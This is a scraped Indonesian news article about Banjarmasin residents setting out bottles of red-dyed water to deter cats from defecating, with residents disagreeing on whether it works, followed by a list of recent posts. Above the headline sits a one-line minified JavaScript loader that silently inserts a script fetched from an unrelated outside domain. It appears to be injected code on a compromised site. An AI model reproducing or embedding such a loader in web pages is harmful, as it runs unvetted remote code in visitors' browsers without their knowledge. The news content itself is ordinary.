(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Fenomena Air Warna Merah di Banjarmasin, Mitos atau Fakta Cegah Kucing Buang Kotoran


KANALKALIMANTAN.CON, BANJARMASIN – Warga Banjarmasin dihebohkan dengan fenomena air berwarna merah dalam botol bekas yang diletakan di halaman atau pagar rumah diyakini bisa mencegah kucing buang kotoran sembarangan.

Seperti yang Kanalkalimantan.com telusuri, Kamis (3/11/2022), terdapat sejumlah air berwarna merah yang dikemas dalam botol bekas air mineral berjejer puluhan di depan rumah warga di Jalan Sungai Miai Dalam, Kota Banjarmasin.

Putri Dewi salah satu warga Kota Banjarmasin, kepada Kanalkalimantan.com, memang meyakini ada perubahan ketika air berwarna merah tersebut ditaruh depan rumah. Ia meyakini tidak ada lagi kucing yang buang kotoran sembarangan di depan warungnya.

“Itu tujuannya biar kucing atau hewan tidak buang kotoran sembarangan, soalnya mama ku punya warung makan, dulunya banyak banget kucing buang kotoran sembarangan habis ditaruh itu tidak ada lagi kucing yang berani buang air di situ,” ujarnya.

 

 

Baca juga: Gubernur Kalsel Pimpin Turdes, Rute 600 Km Melintasi 10 Kabupaten Kota

Sementara itu, Zahra (60) warga Sungai Miai Dalam, dirinya mendapat informasi bahwa dengan meletakkan air berwarna merah tersebut akan mencegah kucing buang kotoran di halaman rumah, akan tetapi dirinya tidak mempercayai sepenuhnya hal tersebut.

“Katanya sih supaya kucing tidak berak sembarangan, tapi tetap berak juga,” ujar Zahra.

Botol air mineral berisi air merah yang disusun berjejer tersebut cukup menarik perhatian pengguna jalan, rata-rata 3 sampai 5 buah botol diletakan warga di pekarangan rumah masing-masing.

Untuk bahannya sendiri, dikatakan Zahra hanya menggunakan pewarna makanan berwarna merah yang dicampurkan dengan air biasa.

Baca juga: Bupati Lamandau Pimpin Raker Bersama Camat Lurah Kades Ketua BPD

“Itu kesumba (pewarna makanan) dicampur dengan banyu (air),” kata salah satu warga Sungai Miai Dalam tersebut.

Pro kontra juga terjadi di laman media sosial, banyak warganet yang tidak percayai dengan khasiat air berwarna merah tersebut, karena menurut meraka tidak logis atau masuk akal.

Disamping itu juga tidak sedikit yang mempercayai khasiat air merah tersebut berdasarkan pengakuan warga atau eksperimen yang telah dilakukannya di rumah. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

9 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

11 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

12 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

13 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

16 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

19 jam ago

This website uses cookies.